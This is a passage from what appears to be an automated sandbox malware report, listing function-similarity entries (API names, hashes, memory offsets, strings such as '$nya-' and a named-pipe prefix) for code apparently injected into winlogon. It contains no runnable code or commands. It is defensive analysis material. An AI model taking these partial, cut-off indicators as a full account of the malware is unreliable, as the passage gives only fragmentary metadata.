                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 40abc1d1199b5cdc770a56a60e0e5f4e9b8051ed8e0c54cf7d7e0152ccf3fe8e
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 5651A332A81B4995FE07DB24D850AE933A1FF4474DFC40825A56C163A5EF76C52AC3E3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 8074ab1debeccdb7de81f9b6b17c497a6e832b8f613fb371d3e6f8c834ae6948
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 7D51C236A91B4995FA07DB28D851AD833A5FF4474CFC08819A52C063A5EF77C51AC3E3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: dd7d2fbe355015c765db1afd73c3d8f2591a8a07618d104dc6321a3fb9c50056
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 8751C372A81B4995FB07DB24D860AE433A1BF0474EFC40819A52D467A5FF7AC619C3E3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $nya-
                                            • API String ID: 756756679-1266920357
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 49d9b1d556f3864c95b1a31ff4b7aec20a143fd073b71ee62d72c1b734a9cc42
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 20319233B45B5996F612DF169540AAA73A0FF84B89F8840208F4857755EF36C4A287C6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $nya-
                                            • API String ID: 756756679-1266920357
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 1920b0173048c2e31b506ed75283f2b7a4db50c395d0afa64895e5cbc0f95bca
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 6131A233B45B9982F612CF169540BA97391BF44B88F888028DF4807755EF3BD4A283C6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $nya-
                                            • API String ID: 756756679-1266920357
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 19b92fad8f820dd81a55a9e9a50199315003bb2ffc475f1c6e47e87a83ff1d46
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 2011B233E8434842F64667316505FFE3141BF85799FD84624A86A367DADE2AC40357C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: be797efc4d241fe522fb318c8b0c2a52a319cfeeeb0bbc57bc3f76715505c0c3
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 25118237E8435882F616A7316911BFE7241BF847A8FD4C628A926567DACE3BD40353C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: a72ea2f354f7ddfc3d159c3a9229b8853cee2434eedb132b01efaf94eb9f651b
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 45115433F8134942FA166731A811BEE3153BF8479DFD84624A866563CADE3AD50183C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 981376d91bc599ae55fe3b6c15a14bb63b400c610608c7f00c9fc4e34d6b33a7
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: F9018B32B40B4486FA11CB12A848B9BB3A1FBC8FC8F8840349E4D47754DE39C986C3C2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 8b86b7224197d8699fc3a6726de84bfb578e7bf873a1a615f1c4c61348878a40
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 7D016132B44B4482F711DB12A854B9973A1FB88FD4F898034AE4D43754DE3EC54AC7D6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: a292ab2cfa75126c4a735770990b9ca6806856f301d60702c71bca0c6d7b623e
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: B9016D32B45B8482FB11DB12E868B9973A1FB88FC8F8940349E5E43754DE3DC685C792
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: ae5bcde55931890828b24d78268571c20791c05152b53787220c891cd16456b3
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 20011E76B5174882FB269B21E448B9772A1FF98B49F940024CD5D1A358EF3EC04A87D3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 778107bd0b08783d02a6487691dad5ad8f670edfcd41cc8f228037a5f129dca4
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 13016136B4174882FB269B25E848B9533A4BF48B59F844428D94D06358EF3FC14AC7DB
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: c63064200cc5015cd9426516bf03d8a10638c949921e829e67ac36650152cb9d
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 8C012176B5274882FB269B61E458F9573B0FF44B4AF840024D94D46358EF3EC549C793
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: d1ff288a7fe1735c0b389d8a0fb70851f6f610ee87196fd53a68ee1478238ee0
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: BAF0A47374478892FB219B21F494B9B7361FBC4B9CFC44021CE4946954DE6DC64AC7D2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: a75b9edf9b8994863e05616ee0606fecf03f18b00d3583885107efc661ca5ccb
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 0DF0A43375478892F7218B20F484B9A7360FB84B9CFC4C025DA4946554DE7EC74AC7D6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 5131f7decd79886618750e5d372dbf6a6da6afe116d4c20a90690d0bf9f1d3e7
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 69F0AF73B5878892FB218B24F8D4B997371FB44B8CFC44021CA4942958DE6EC788CB52
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: c70e5ec6ea267bb5cb580a1a018e7bc41a37316a57f8b87e098493fbd84ad30a
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: E6F0683265470941FA114B24D884B9B7720FF89759FD402199E69491E4CF2EC44AC6C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: a6a4aab0aeac4f6197f237278a9c0a3b7006fc945381a0c775642f0a2f533f1f
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 4FF05E76B44B8881FA058B13B91459BB260FFC8FC9F848430EE0A0BB18DE69C44687C3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
